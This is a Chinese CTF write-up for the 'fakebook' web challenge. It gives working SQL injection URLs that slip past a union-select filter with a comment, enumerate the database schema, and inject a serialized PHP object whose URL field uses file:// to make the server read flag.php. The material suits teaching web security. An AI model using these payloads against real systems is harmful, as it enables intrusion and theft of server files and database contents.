当前位置: 首页 > article >正文

攻防世界36-fakebook-CTFWeb

article 2025/1/16 12:30:09

攻防世界36-fakebook-CTFWeb

没发现什么,随便join发现blog有过滤,dirsearch扫描一下,发现robots.txt,和flag.php(不能直接看),发现源码泄露,下载得源码:

<?php

class UserInfo{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url){
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents (){
        return $this->get($this->blog);
    }

    public function isValidBlog (){
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }
}

return preg_match(“/^(((http(s?))😕/)?)([0-9a-zA-Z-]+.)+[a-zA-Z]{2,6}(:[0-9]+)?(/\S*)?$/i”, $blog);

输入要符合这个,我们随便输几个

image-20241111091330278

点进去

image-20241111091353766

这可能是个sql注入问题,有一个no=1,可能是在查询数据库

试试

http://61.147.171.105:51284/view.php?no=2

image-20241111091523625

http://61.147.171.105:51284/view.php?no=3 or 1 = 1

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

存在注入

http://61.147.171.105:51284/view.php?no=3 union select 1,2,3,4

显示no_hack,测了一下select和union都没被过滤,但是union select被过滤了试试下面这种

http://61.147.171.105:51284/view.php?no=3 union/**/select 1,2,3,4

image-20241111091748732

回显2

http://61.147.171.105:51284/view.php?no=3 union/**/select 1,version(),3,4
http://61.147.171.105:51284/view.php?no=3 union/**/select 1,database(),3,4
http://61.147.171.105:51284/view.php?no=3 union/**/select 1,group_concat(tablename),3,4
http://61.147.171.105:51284/view.php?no=3 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()
http://61.147.171.105:51284/view.php?no=3 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where column_schema='users'
http://61.147.171.105:51284/view.php?no=3 union/**/select 1,group_concat(no,username,passwd,data),3,4  from users
http://61.147.171.105:51284/view.php?no=3 union/**/select 1,group_concat(no,'-',username,'-',passwd,'-',data),3,4  from users

显示:

image-20241111093248646

好像是序列化的东西

data:O:8:"UserInfo":3:{s:4:"name";s:6:"232323";s:3:"age";i:1;s:4:"blog";s:28:"https://ctf.show/challenges#";}

cuit_init()用来初始化一个curl会话,curl可以使用file伪协议读取文件。

CURLOPT_RETURNTRANSFER选项将 cURL 配置为返回请求结果,而不是直接在页面上输出.返回的内容将存储在 $output 变量中。

一开始想到的是SSRF后来测试不行,文件包含漏洞也行,攻击者通过提供恶意 URL(如 file:// 协议)来强制服务器包含本地文件,甚至执行恶意脚本。

/var/www/html/view.php之前dirsearch view.php和flag.php应该是同一级目录下

<?php   
class UserInfo
{
    public $name = "1";  
    public $age = 1;     
    public $blog = "file:///var/www/html/flag.php";
}
$a=new UserInfo();
echo(serialize($a)); 
?>

?no=2 union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:1:"1";s:3:"age";i:1;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'

image-20241111095106866

:4:“name”;s:1:“1”;s:3:“age”;i:1;s:4:“blog”;s:29:“file:///var/www/html/flag.php”;}’


[外链图片转存中...(img-kKBKyhX9-1731290396681)]

http://www.kler.cn/a/390287.html

相关文章:

  • 单片机的原理及其应用:从入门到进阶的全方位指南
  • 左神算法基础提升--1
  • Oracle 使用dbms_stats.gather_table_stats来进行表analyse,收集表统计信息
  • 赛灵思(Xilinx)公司Artix-7系列FPGA
  • 华为数通HCIE备考经验分享
  • nvm 管理nodejs,安装pnpm后报错,出现:pnpm不是内部或外部命令,也不是可运行的程序或批处理文件。
  • 苍穹外卖 数据可视化
  • 标准化 Git 提交信息的约定
  • 17RAL_Visual-Inertial Monocular SLAM with Map Reuse
  • 基础算法练习--滑动窗口(已完结)
  • 分布式环境下宕机的处理方案有哪些?
  • 简单易用的 Node.js Git库
  • Oracle XE命令行创建数据库的一波三折(已解决)
  • 深度学习在推荐系统中的应用
  • Taro React-Native IOS 打包发布
  • 【R78/G15 开发板测评】串口打印 DHT11 温湿度传感器、DS18B20 温度传感器数据,LabVIEW 上位机绘制演化曲线
  • 本地连接IP地址的自主设置指南‌
  • 力扣 LeetCode 209. 长度最小的子数组
  • 传统型视频展台方案分享
  • IDEA打开项目后,所有文件都在报错(包括JDK自带的类也报错)
  • 磁集成技术给磁性材料带来哪些新要求?
  • 使用闲置安卓手机实现程图传
  • 【C++笔记】C++三大特性之继承
  • wordpress搬家迁移后怎么修改数据库用户名
  • redis 三种持久化对比
  • websocket服务器(协程风格)--swoole进阶篇